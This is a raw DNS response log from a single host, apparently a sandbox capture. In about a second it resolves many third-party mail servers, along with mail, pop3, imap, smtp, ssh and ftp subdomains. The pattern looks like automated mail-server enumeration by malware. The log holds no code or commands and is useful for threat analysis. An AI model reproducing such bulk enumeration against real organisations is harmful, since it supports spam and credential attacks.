Dec 22, 2023 21:14:50.643071890 CET	1.1.1.1	192.168.2.4	0xc0b4	No error (0)	saltdelcolom.com		50.31.65.5	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.643440962 CET	1.1.1.1	192.168.2.4	0x2b07	Name error (3)	srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.643455029 CET	1.1.1.1	192.168.2.4	0xa7ca	No error (0)	mailbox.lpl.org		96.249.39.20	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.643487930 CET	1.1.1.1	192.168.2.4	0x792c	No error (0)	eddc.com		208.91.197.26	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.643502951 CET	1.1.1.1	192.168.2.4	0x31c	No error (0)	jaydien.com		141.193.213.11	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.643502951 CET	1.1.1.1	192.168.2.4	0x31c	No error (0)	jaydien.com		141.193.213.10	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.643532991 CET	1.1.1.1	192.168.2.4	0xc957	No error (0)	adm-works.com		216.194.166.146	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.645350933 CET	1.1.1.1	192.168.2.4	0x58b6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.9.0	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.645350933 CET	1.1.1.1	192.168.2.4	0x58b6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.41.3	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.645350933 CET	1.1.1.1	192.168.2.4	0x58b6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.11.2	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.645350933 CET	1.1.1.1	192.168.2.4	0x58b6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.40.0	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.645350933 CET	1.1.1.1	192.168.2.4	0x58b6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.41.4	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.645350933 CET	1.1.1.1	192.168.2.4	0x58b6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.41.0	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.651328087 CET	1.1.1.1	192.168.2.4	0xc6f0	No error (0)	aspmx.l.google.com		172.217.204.27	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.652074099 CET	1.1.1.1	192.168.2.4	0xbae2	No error (0)	mailstore1.secureserver.net		216.69.141.82	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.652074099 CET	1.1.1.1	192.168.2.4	0xbae2	No error (0)	mailstore1.secureserver.net		68.178.213.244	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.652074099 CET	1.1.1.1	192.168.2.4	0xbae2	No error (0)	mailstore1.secureserver.net		68.178.213.243	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.665654898 CET	1.1.1.1	192.168.2.4	0xe5d7	No error (0)	mx01.dondominio.com		31.214.176.67	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.679101944 CET	1.1.1.1	192.168.2.4	0x1338	No error (0)	dl-it.net		172.98.192.36	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.679191113 CET	1.1.1.1	192.168.2.4	0x1338	No error (0)	dl-it.net		172.98.192.36	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.709496021 CET	1.1.1.1	192.168.2.4	0x9594	No error (0)	ismaworld-com.mail.protection.outlook.com		104.47.74.202	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.790469885 CET	1.1.1.1	192.168.2.4	0x9594	No error (0)	ismaworld-com.mail.protection.outlook.com		104.47.74.202	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.791110992 CET	1.1.1.1	192.168.2.4	0xe5d7	No error (0)	mx01.dondominio.com		31.214.176.67	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.856735945 CET	1.1.1.1	192.168.2.4	0x3f43	Name error (3)	smartiebritches-com.mail.protection.outlook.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.857875109 CET	1.1.1.1	192.168.2.4	0xc8d6	No error (0)	mx1-us1.ppe-hosted.com		148.163.129.50	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.857875109 CET	1.1.1.1	192.168.2.4	0xc8d6	No error (0)	mx1-us1.ppe-hosted.com		67.231.154.162	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.865989923 CET	1.1.1.1	192.168.2.4	0x10b4	No error (0)	d298861b.ess.barracudanetworks.com		209.222.82.253	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.865989923 CET	1.1.1.1	192.168.2.4	0x10b4	No error (0)	d298861b.ess.barracudanetworks.com		209.222.82.252	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.865989923 CET	1.1.1.1	192.168.2.4	0x10b4	No error (0)	d298861b.ess.barracudanetworks.com		209.222.82.255	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.866506100 CET	1.1.1.1	192.168.2.4	0x929a	No error (0)	cgoc.in.tmes.trendmicro.com		18.208.22.79	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.866506100 CET	1.1.1.1	192.168.2.4	0x929a	No error (0)	cgoc.in.tmes.trendmicro.com		18.208.22.77	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.866506100 CET	1.1.1.1	192.168.2.4	0x929a	No error (0)	cgoc.in.tmes.trendmicro.com		18.208.22.78	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.866506100 CET	1.1.1.1	192.168.2.4	0x929a	No error (0)	cgoc.in.tmes.trendmicro.com		18.208.22.80	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.874856949 CET	1.1.1.1	192.168.2.4	0x3df0	No error (0)	mailgate.customintegrated.com		199.59.243.225	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.876413107 CET	1.1.1.1	192.168.2.4	0x3354	No error (0)	alt3.aspmx.l.google.com		64.233.184.26	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.879894018 CET	1.1.1.1	192.168.2.4	0xf05d	No error (0)	viruswall.tvs-e.in		115.111.182.213	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.890101910 CET	1.1.1.1	192.168.2.4	0x63bc	No error (0)	mx.core.locaweb.com.br		177.153.23.241	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.890333891 CET	1.1.1.1	192.168.2.4	0xde21	No error (0)	mx-biz.mail.am0.yahoodns.net		67.195.204.83	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.890333891 CET	1.1.1.1	192.168.2.4	0xde21	No error (0)	mx-biz.mail.am0.yahoodns.net		67.195.228.75	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.896188021 CET	1.1.1.1	192.168.2.4	0x3a57	No error (0)	d298861a.ess.barracudanetworks.com		209.222.82.255	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.896188021 CET	1.1.1.1	192.168.2.4	0x3a57	No error (0)	d298861a.ess.barracudanetworks.com		209.222.82.253	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.896188021 CET	1.1.1.1	192.168.2.4	0x3a57	No error (0)	d298861a.ess.barracudanetworks.com		209.222.82.252	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.908544064 CET	1.1.1.1	192.168.2.4	0x1c78	No error (0)	mail.yandfcorp.com	pop.secureserver.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:50.908544064 CET	1.1.1.1	192.168.2.4	0x1c78	No error (0)	pop.secureserver.net	pop.vox.secureserver.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:50.908544064 CET	1.1.1.1	192.168.2.4	0x1c78	No error (0)	pop.vox.secureserver.net	pop.us-phx.vox.secureserver.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:50.908544064 CET	1.1.1.1	192.168.2.4	0x1c78	No error (0)	pop.us-phx.vox.secureserver.net		68.178.252.117	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.908544064 CET	1.1.1.1	192.168.2.4	0x1c78	No error (0)	pop.us-phx.vox.secureserver.net		173.201.193.97	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.908544064 CET	1.1.1.1	192.168.2.4	0x1c78	No error (0)	pop.us-phx.vox.secureserver.net		173.201.193.240	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.908544064 CET	1.1.1.1	192.168.2.4	0x1c78	No error (0)	pop.us-phx.vox.secureserver.net		68.178.252.246	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.908544064 CET	1.1.1.1	192.168.2.4	0x1c78	No error (0)	pop.us-phx.vox.secureserver.net		68.178.252.116	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.908544064 CET	1.1.1.1	192.168.2.4	0x1c78	No error (0)	pop.us-phx.vox.secureserver.net		68.178.252.153	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.908544064 CET	1.1.1.1	192.168.2.4	0x1c78	No error (0)	pop.us-phx.vox.secureserver.net		68.178.252.247	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.908544064 CET	1.1.1.1	192.168.2.4	0x1c78	No error (0)	pop.us-phx.vox.secureserver.net		68.178.252.154	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.910231113 CET	1.1.1.1	192.168.2.4	0x97d3	Name error (3)	ftp.pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.911958933 CET	1.1.1.1	192.168.2.4	0x578e	No error (0)	bldowney.com.1.0001.arsmtp.com		8.31.233.168	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.919447899 CET	1.1.1.1	192.168.2.4	0xe35d	No error (0)	mx.coxmail.com		34.196.6.209	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.919447899 CET	1.1.1.1	192.168.2.4	0xe35d	No error (0)	mx.coxmail.com		52.40.235.249	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.919447899 CET	1.1.1.1	192.168.2.4	0xe35d	No error (0)	mx.coxmail.com		52.22.102.143	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.919447899 CET	1.1.1.1	192.168.2.4	0xe35d	No error (0)	mx.coxmail.com		52.13.194.227	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.923985958 CET	1.1.1.1	192.168.2.4	0x3d68	Name error (3)	smtp.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.926809072 CET	1.1.1.1	192.168.2.4	0xd2f5	Name error (3)	ssh.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.927290916 CET	1.1.1.1	192.168.2.4	0x8c4e	Name error (3)	mail.djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.940349102 CET	1.1.1.1	192.168.2.4	0xc890	No error (0)	mail.customintegrated.com		199.59.243.225	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.945655107 CET	1.1.1.1	192.168.2.4	0x78c4	Name error (3)	mailgate.valentinegrowers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.953608036 CET	1.1.1.1	192.168.2.4	0x3f43	Name error (3)	smartiebritches-com.mail.protection.outlook.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.954376936 CET	1.1.1.1	192.168.2.4	0xb6c4	No error (0)	davescheirer-com.mail.protection.outlook.com		104.47.75.164	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.954376936 CET	1.1.1.1	192.168.2.4	0xb6c4	No error (0)	davescheirer-com.mail.protection.outlook.com		104.47.75.228	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.957050085 CET	1.1.1.1	192.168.2.4	0xa5ce	Name error (3)	imap.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.957612038 CET	1.1.1.1	192.168.2.4	0x743	No error (0)	alt1.aspmx.l.google.com		64.233.186.27	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.964890003 CET	1.1.1.1	192.168.2.4	0x40b4	No error (0)	yandfcorp-com.mail.protection.outlook.com		104.47.66.10	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.964890003 CET	1.1.1.1	192.168.2.4	0x40b4	No error (0)	yandfcorp-com.mail.protection.outlook.com		104.47.59.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.966027975 CET	1.1.1.1	192.168.2.4	0x84eb	No error (0)	mx.b.locaweb.com.br		177.153.23.242	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.970046043 CET	1.1.1.1	192.168.2.4	0xe99f	No error (0)	mail.easlab.com	easlab.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:50.970046043 CET	1.1.1.1	192.168.2.4	0xe99f	No error (0)	easlab.com		192.185.183.254	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.981748104 CET	1.1.1.1	192.168.2.4	0x3117	Name error (3)	mail.harrell-associates.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.987879992 CET	1.1.1.1	192.168.2.4	0x4f8c	Name error (3)	pop.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.999825001 CET	1.1.1.1	192.168.2.4	0x1e6a	No error (0)	mail.eddc.com		208.91.197.26	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.016297102 CET	1.1.1.1	192.168.2.4	0x643d	Name error (3)	mail.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.017525911 CET	1.1.1.1	192.168.2.4	0x4779	Name error (3)	ssh.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.024910927 CET	1.1.1.1	192.168.2.4	0x4e92	Name error (3)	mail.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.025082111 CET	1.1.1.1	192.168.2.4	0x138a	No error (0)	imap.eddc.com		208.91.197.26	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.026575089 CET	1.1.1.1	192.168.2.4	0xf079	Name error (3)	pop3.maroonshockey.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.054915905 CET	1.1.1.1	192.168.2.4	0x1d15	No error (0)	dpikorea.org		183.111.174.109	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.054932117 CET	1.1.1.1	192.168.2.4	0x1d15	No error (0)	dpikorea.org		183.111.174.109	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.081173897 CET	1.1.1.1	192.168.2.4	0x40b4	No error (0)	yandfcorp-com.mail.protection.outlook.com		104.47.66.10	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.081173897 CET	1.1.1.1	192.168.2.4	0x40b4	No error (0)	yandfcorp-com.mail.protection.outlook.com		104.47.59.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.081511974 CET	1.1.1.1	192.168.2.4	0x643d	Name error (3)	mail.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.082204103 CET	1.1.1.1	192.168.2.4	0xd2f5	Name error (3)	ssh.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.082253933 CET	1.1.1.1	192.168.2.4	0x1e6a	No error (0)	mail.eddc.com		208.91.197.26	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.082309961 CET	1.1.1.1	192.168.2.4	0x3d68	Name error (3)	smtp.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.082357883 CET	1.1.1.1	192.168.2.4	0xc890	No error (0)	mail.customintegrated.com		199.59.243.225	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.082372904 CET	1.1.1.1	192.168.2.4	0xe99f	No error (0)	mail.easlab.com	easlab.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:51.082372904 CET	1.1.1.1	192.168.2.4	0xe99f	No error (0)	easlab.com		192.185.183.254	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.082452059 CET	1.1.1.1	192.168.2.4	0x3117	Name error (3)	mail.harrell-associates.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.082472086 CET	1.1.1.1	192.168.2.4	0x138a	No error (0)	imap.eddc.com		208.91.197.26	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.082531929 CET	1.1.1.1	192.168.2.4	0x97d3	Name error (3)	ftp.pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.082578897 CET	1.1.1.1	192.168.2.4	0xb6c4	No error (0)	davescheirer-com.mail.protection.outlook.com		104.47.75.164	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.082578897 CET	1.1.1.1	192.168.2.4	0xb6c4	No error (0)	davescheirer-com.mail.protection.outlook.com		104.47.75.228	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.082624912 CET	1.1.1.1	192.168.2.4	0xe35d	No error (0)	mx.coxmail.com		34.196.6.209	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.082624912 CET	1.1.1.1	192.168.2.4	0xe35d	No error (0)	mx.coxmail.com		52.40.235.249	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.082624912 CET	1.1.1.1	192.168.2.4	0xe35d	No error (0)	mx.coxmail.com		52.22.102.143	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.082624912 CET	1.1.1.1	192.168.2.4	0xe35d	No error (0)	mx.coxmail.com		52.13.194.227	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.082676888 CET	1.1.1.1	192.168.2.4	0x8c4e	Name error (3)	mail.djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.082691908 CET	1.1.1.1	192.168.2.4	0x78c4	Name error (3)	mailgate.valentinegrowers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.082751036 CET	1.1.1.1	192.168.2.4	0x4779	Name error (3)	ssh.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.082798004 CET	1.1.1.1	192.168.2.4	0x578e	No error (0)	bldowney.com.1.0001.arsmtp.com		8.31.233.168	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.093983889 CET	1.1.1.1	192.168.2.4	0x5d24	No error (0)	aspmx2.googlemail.com		64.233.186.27	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.097415924 CET	1.1.1.1	192.168.2.4	0x2d39	No error (0)	us-smtp-inbound-1.mimecast.com		205.139.110.221	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.097415924 CET	1.1.1.1	192.168.2.4	0x2d39	No error (0)	us-smtp-inbound-1.mimecast.com		207.211.30.141	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.097415924 CET	1.1.1.1	192.168.2.4	0x2d39	No error (0)	us-smtp-inbound-1.mimecast.com		205.139.110.242	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.097415924 CET	1.1.1.1	192.168.2.4	0x2d39	No error (0)	us-smtp-inbound-1.mimecast.com		207.211.30.242	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.097415924 CET	1.1.1.1	192.168.2.4	0x2d39	No error (0)	us-smtp-inbound-1.mimecast.com		205.139.110.141	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.097415924 CET	1.1.1.1	192.168.2.4	0x2d39	No error (0)	us-smtp-inbound-1.mimecast.com		207.211.30.221	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.112607956 CET	1.1.1.1	192.168.2.4	0x9902	No error (0)	mx.avasin.plus.net		212.159.8.200	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.112607956 CET	1.1.1.1	192.168.2.4	0x9902	No error (0)	mx.avasin.plus.net		212.159.9.200	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.112688065 CET	1.1.1.1	192.168.2.4	0x9902	No error (0)	mx.avasin.plus.net		212.159.8.200	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.112688065 CET	1.1.1.1	192.168.2.4	0x9902	No error (0)	mx.avasin.plus.net		212.159.9.200	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.113097906 CET	1.1.1.1	192.168.2.4	0xcc57	Name error (3)	pop3.williamcroy.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.113115072 CET	1.1.1.1	192.168.2.4	0xcc57	Name error (3)	pop3.williamcroy.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.135449886 CET	1.1.1.1	192.168.2.4	0x26e1	No error (0)	pcfocus.com.hk		218.213.216.3	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.135461092 CET	1.1.1.1	192.168.2.4	0x26e1	No error (0)	pcfocus.com.hk		218.213.216.3	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.153584003 CET	1.1.1.1	192.168.2.4	0x4f68	No error (0)	ASPMX.daum.net		121.53.85.23	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.156975985 CET	1.1.1.1	192.168.2.4	0x4e92	Name error (3)	mail.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.157232046 CET	1.1.1.1	192.168.2.4	0x4f68	No error (0)	ASPMX.daum.net		121.53.85.23	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.157856941 CET	1.1.1.1	192.168.2.4	0xf079	Name error (3)	pop3.maroonshockey.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.177258015 CET	1.1.1.1	192.168.2.4	0x4e74	No error (0)	mx.enricobassi.com		62.149.128.163	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.177258015 CET	1.1.1.1	192.168.2.4	0x4e74	No error (0)	mx.enricobassi.com		62.149.128.151	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.177258015 CET	1.1.1.1	192.168.2.4	0x4e74	No error (0)	mx.enricobassi.com		62.149.128.166	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.177258015 CET	1.1.1.1	192.168.2.4	0x4e74	No error (0)	mx.enricobassi.com		62.149.128.160	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.177258015 CET	1.1.1.1	192.168.2.4	0x4e74	No error (0)	mx.enricobassi.com		62.149.128.157	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.177258015 CET	1.1.1.1	192.168.2.4	0x4e74	No error (0)	mx.enricobassi.com		62.149.128.154	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.177341938 CET	1.1.1.1	192.168.2.4	0x4e74	No error (0)	mx.enricobassi.com		62.149.128.163	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.177341938 CET	1.1.1.1	192.168.2.4	0x4e74	No error (0)	mx.enricobassi.com		62.149.128.151	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.177341938 CET	1.1.1.1	192.168.2.4	0x4e74	No error (0)	mx.enricobassi.com		62.149.128.166	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.177341938 CET	1.1.1.1	192.168.2.4	0x4e74	No error (0)	mx.enricobassi.com		62.149.128.160	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.177341938 CET	1.1.1.1	192.168.2.4	0x4e74	No error (0)	mx.enricobassi.com		62.149.128.157	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.177341938 CET	1.1.1.1	192.168.2.4	0x4e74	No error (0)	mx.enricobassi.com		62.149.128.154	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.189609051 CET	1.1.1.1	192.168.2.4	0x2d23	No error (0)	mx003.netsol.xion.oxcs.net		51.81.206.108	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.191812992 CET	1.1.1.1	192.168.2.4	0x5fad	No error (0)	inbound-reply.s7.exacttarget.com		136.147.189.244	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.192224026 CET	1.1.1.1	192.168.2.4	0x93d	No error (0)	mail4.stememail.net		165.22.195.184	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.195205927 CET	1.1.1.1	192.168.2.4	0x7712	No error (0)	pop.valentinegrowers.com	pop.one.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:51.195205927 CET	1.1.1.1	192.168.2.4	0x7712	No error (0)	pop.one.com		46.30.211.110	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.195205927 CET	1.1.1.1	192.168.2.4	0x7712	No error (0)	pop.one.com		46.30.211.111	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.195302963 CET	1.1.1.1	192.168.2.4	0x7712	No error (0)	pop.valentinegrowers.com	pop.one.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:51.195302963 CET	1.1.1.1	192.168.2.4	0x7712	No error (0)	pop.one.com		46.30.211.110	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.195302963 CET	1.1.1.1	192.168.2.4	0x7712	No error (0)	pop.one.com		46.30.211.111	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.207757950 CET	1.1.1.1	192.168.2.4	0x3ca2	No error (0)	racesystems-com-au.mail.protection.outlook.com		104.47.71.202	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.207757950 CET	1.1.1.1	192.168.2.4	0x3ca2	No error (0)	racesystems-com-au.mail.protection.outlook.com		104.47.71.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.211652040 CET	1.1.1.1	192.168.2.4	0x6827	No error (0)	mail.adm-works.com		216.194.166.146	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.212461948 CET	1.1.1.1	192.168.2.4	0xca6d	No error (0)	mx01.mailcluster.com.au		202.130.44.227	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.212461948 CET	1.1.1.1	192.168.2.4	0xca6d	No error (0)	mx01.mailcluster.com.au		202.130.45.7	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.212461948 CET	1.1.1.1	192.168.2.4	0xca6d	No error (0)	mx01.mailcluster.com.au		202.130.45.2	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.212461948 CET	1.1.1.1	192.168.2.4	0xca6d	No error (0)	mx01.mailcluster.com.au		101.0.120.34	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.224159956 CET	1.1.1.1	192.168.2.4	0xca2b	No error (0)	alt4.aspmx.l.google.com		142.250.27.26	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.228782892 CET	1.1.1.1	192.168.2.4	0xca6d	No error (0)	mx01.mailcluster.com.au		202.130.44.227	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.228782892 CET	1.1.1.1	192.168.2.4	0xca6d	No error (0)	mx01.mailcluster.com.au		202.130.45.2	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.228782892 CET	1.1.1.1	192.168.2.4	0xca6d	No error (0)	mx01.mailcluster.com.au		101.0.120.34	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.228782892 CET	1.1.1.1	192.168.2.4	0xca6d	No error (0)	mx01.mailcluster.com.au		202.130.45.7	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.237241983 CET	1.1.1.1	192.168.2.4	0xc13c	No error (0)	viruswall.tvs-e.in		115.111.182.213	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.244309902 CET	1.1.1.1	192.168.2.4	0x8d63	No error (0)	zonemx.eu		85.234.244.76	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.244309902 CET	1.1.1.1	192.168.2.4	0x8d63	No error (0)	zonemx.eu		85.234.244.77	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.244309902 CET	1.1.1.1	192.168.2.4	0x8d63	No error (0)	zonemx.eu		85.234.244.107	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.244309902 CET	1.1.1.1	192.168.2.4	0x8d63	No error (0)	zonemx.eu		85.234.244.108	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.244378090 CET	1.1.1.1	192.168.2.4	0x8d63	No error (0)	zonemx.eu		85.234.244.76	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.244378090 CET	1.1.1.1	192.168.2.4	0x8d63	No error (0)	zonemx.eu		85.234.244.77	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.244378090 CET	1.1.1.1	192.168.2.4	0x8d63	No error (0)	zonemx.eu		85.234.244.107	A (IP address)	IN (0x0001)	false
